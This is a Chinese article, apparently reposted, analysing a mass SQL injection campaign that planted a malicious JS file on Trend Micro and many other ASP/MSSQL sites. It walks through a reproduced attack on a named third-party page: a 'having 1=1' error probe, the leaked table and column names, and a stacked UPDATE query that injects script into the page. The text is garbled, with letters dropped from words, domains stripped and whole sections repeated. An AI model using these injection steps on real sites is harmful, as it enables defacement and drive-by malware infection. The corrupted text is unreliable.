关于趋势科技等网站被攻击的分析
网站建设 2023-02-09 11:06www.1681989.com免费网站
一. 在网上找到了这次攻击的新闻报道
http://.nsfocus./news/6697
http://hi.baidu./secway/blog/item/e80d8efa4bf73ddab48f31a3.html
通过GOOGLE搜索到了相关被黑的页面
http://.google./search?hl=zh-CN&q=site:trendmicro. .2117966. fkjp.js&btnG=Google 鎼滅储&meta=&aq=f
趋势科技的页面被插入过http://.2117966./fkjp.js相关的JS挂马。
二. 直接查找这个JS相关的信息 http://.google./search?plete=1&hl=zh-CN&newwdow=1&q=.2117966. fkjp.js&meta=&aq=f 发现了12,500项符合的结果,这些返回的结果信息都是当前页面被插入了JS挂马。 通过分析发现被黑的页面都有如下特征 1.被修改页面的网站都是ASP MSSQL的架构。 2.被修改的页面都存在SQL注入漏洞。
三. 取了其中一个被挂马页面做了SQL注入挂马的模拟攻击 1. http://.wisard./wisard/shared/asp/Generalpersonfo/StrPersonOverview.asp?person=5162 这个链接存在明显的SQL注入,对person参数注入语句havg 1=1,将暴出当前页面注入点的表名为coordator,字段名ShCoordatorSurame。 http://.wisard./wisard/shared/asp/Generalpersonfo/StrPersonOverview.asp?person=5162 havg 1=1 —————————
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordator.ShCoordatorSurame’ is valid the select list because it is not contaed an aggregate function and there is no GROUP BY clause.
/wisard/shared/asp/Generalpersonfo/StrPersonOverview.asp, le 20
—————————- 2. 修改暴出的当前页面的表名,字段名内容为插入JS的代码来实现挂马 http://.wisard./wisard/shared/asp/Generalpersonfo/StrPersonOverview.asp?person=5162;update coordator set ShCoordatorSurame=’’ where 1=1–– 修改coordator 表 ShCoordatorSurame 字段内容为,设一个1=1为真的逻辑条件就可以修改当前页面查询数据的内容. 就可以实现在有SQL注入点的页面直接挂马。
四.. 这次大规模攻击的流程应该是自动化的 1.通过先进的扫描技术批量收集到几万网站的SQL注入漏洞。 2.针对漏洞攻击,进行自动化的SQL注入挂马。 现今虽然SQL注入漏洞已经很老了,这次黑客在一天内对数万网站攻击挂马的技术却是很惊人的,连趋势这样的安全公司也未能幸免。
二. 直接查找这个JS相关的信息 http://.google./search?plete=1&hl=zh-CN&newwdow=1&q=.2117966. fkjp.js&meta=&aq=f 发现了12,500项符合的结果,这些返回的结果信息都是当前页面被插入了JS挂马。 通过分析发现被黑的页面都有如下特征 1.被修改页面的网站都是ASP MSSQL的架构。 2.被修改的页面都存在SQL注入漏洞。
三. 取了其中一个被挂马页面做了SQL注入挂马的模拟攻击 1. http://.wisard./wisard/shared/asp/Generalpersonfo/StrPersonOverview.asp?person=5162 这个链接存在明显的SQL注入,对person参数注入语句havg 1=1,将暴出当前页面注入点的表名为coordator,字段名ShCoordatorSurame。 http://.wisard./wisard/shared/asp/Generalpersonfo/StrPersonOverview.asp?person=5162 havg 1=1 —————————
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘coordator.ShCoordatorSurame’ is valid the select list because it is not contaed an aggregate function and there is no GROUP BY clause.
/wisard/shared/asp/Generalpersonfo/StrPersonOverview.asp, le 20
—————————- 2. 修改暴出的当前页面的表名,字段名内容为插入JS的代码来实现挂马 http://.wisard./wisard/shared/asp/Generalpersonfo/StrPersonOverview.asp?person=5162;update coordator set ShCoordatorSurame=’’ where 1=1–– 修改coordator 表 ShCoordatorSurame 字段内容为,设一个1=1为真的逻辑条件就可以修改当前页面查询数据的内容. 就可以实现在有SQL注入点的页面直接挂马。
四.. 这次大规模攻击的流程应该是自动化的 1.通过先进的扫描技术批量收集到几万网站的SQL注入漏洞。 2.针对漏洞攻击,进行自动化的SQL注入挂马。 现今虽然SQL注入漏洞已经很老了,这次黑客在一天内对数万网站攻击挂马的技术却是很惊人的,连趋势这样的安全公司也未能幸免。
上一篇:linux入侵踪迹隐藏攻略
下一篇:实战讲解跨站入侵攻击